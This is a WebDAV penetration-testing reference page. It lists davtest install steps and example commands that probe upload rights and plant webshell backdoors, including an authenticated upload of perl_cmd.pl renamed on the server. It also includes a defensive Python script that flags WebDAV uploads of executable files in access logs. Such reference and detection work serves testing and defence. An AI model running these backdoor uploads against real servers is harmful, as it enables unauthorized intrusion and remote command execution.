Pentesting WebDAV - port 80,443

A list of Pentesting Techniques for WebDAV.

Scanning tools

davtest

davtest is a tool that can be used to automate the exploitation of WebDAV. It tries to create files and directories, upload webshells, etc.

Requirements

Two Perl modules are required; both can be installed with apt.

sudo apt install libhttp-dav-perl
sudo apt install libgetopt-long-descriptive-perl

Example

# Test file uploads at the given URL
davtest.pl -url <URL>
# Test file uploads at the given URL and send backdoors for any that succeed
davtest.pl -url <URL> -sendbd auto

# Upload a file using authentication, send the perl_cmd.pl backdoor and call it perl.pl on the server
davtest.pl -url <URL> -auth <username>:<password> -uploadfile backdoors/perl_cmd.pl -uploadloc perl.pl

GitHub: https://github.com/cldrn/davtest
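The file and directory creation described above is visible in web server access logs as WebDAV write methods. The following is an added example, not part of davtest or the original page, that summarizes such requests per client and flags successful uploads of server-executable file types. It assumes the Apache/nginx "combined" log format; the sample lines, paths, addresses and the extension list are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample lines in "combined" log format (not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [10/Mar/2024:10:00:01 +0000] "MKCOL /dav/testdir_a1b2/ HTTP/1.1" 201 0 "-" "-"
198.51.100.7 - - [10/Mar/2024:10:00:02 +0000] "PUT /dav/testdir_a1b2/probe.txt HTTP/1.1" 201 0 "-" "-"
198.51.100.7 - - [10/Mar/2024:10:00:02 +0000] "PUT /dav/testdir_a1b2/probe.php HTTP/1.1" 201 0 "-" "-"
198.51.100.7 - - [10/Mar/2024:10:00:03 +0000] "PUT /dav/testdir_a1b2/probe.asp HTTP/1.1" 403 199 "-" "-"
203.0.113.20 - - [10/Mar/2024:10:05:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.20 - - [10/Mar/2024:10:06:00 +0000] "PUT /dav/report.docx HTTP/1.1" 204 0 "-" "Microsoft-WebDAV-MiniRedir"
"""

# client, method, path, status from one combined-format line
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')
WRITE_METHODS = {"PUT", "MKCOL", "MOVE", "COPY", "DELETE"}
# Assumed list of extensions a server might execute; match it to the enabled handlers.
EXEC_EXT = re.compile(r"\.(php|asp|aspx|jsp|cgi|pl|cfm|shtml)$", re.I)

def summarize(log_text):
    """Per-client counts of WebDAV write attempts, successes and executable uploads."""
    stats = defaultdict(lambda: {"attempts": 0, "succeeded": 0, "exec_uploads": []})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        client, method, path, status = m.group(1), m.group(2), m.group(3), int(m.group(4))
        if method not in WRITE_METHODS:
            continue
        s = stats[client]
        s["attempts"] += 1
        if 200 <= status < 300:
            s["succeeded"] += 1
            # A 2xx PUT of an executable extension means the file was stored.
            if method == "PUT" and EXEC_EXT.search(path.split("?", 1)[0]):
                s["exec_uploads"].append(path)
    return dict(stats)

def findings(log_text, min_attempts=3):
    """Clients that stored an executable file or sent several write requests."""
    return {c: s for c, s in summarize(log_text).items()
            if s["exec_uploads"] or s["attempts"] >= min_attempts}

if __name__ == "__main__":
    for client, s in findings(SAMPLE_LOG).items():
        print(client, s)
```

A client with several write attempts across many extensions in a short window, some rejected and some accepted, is the pattern to triage first; a single PUT of a document from a regular WebDAV client is not flagged.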
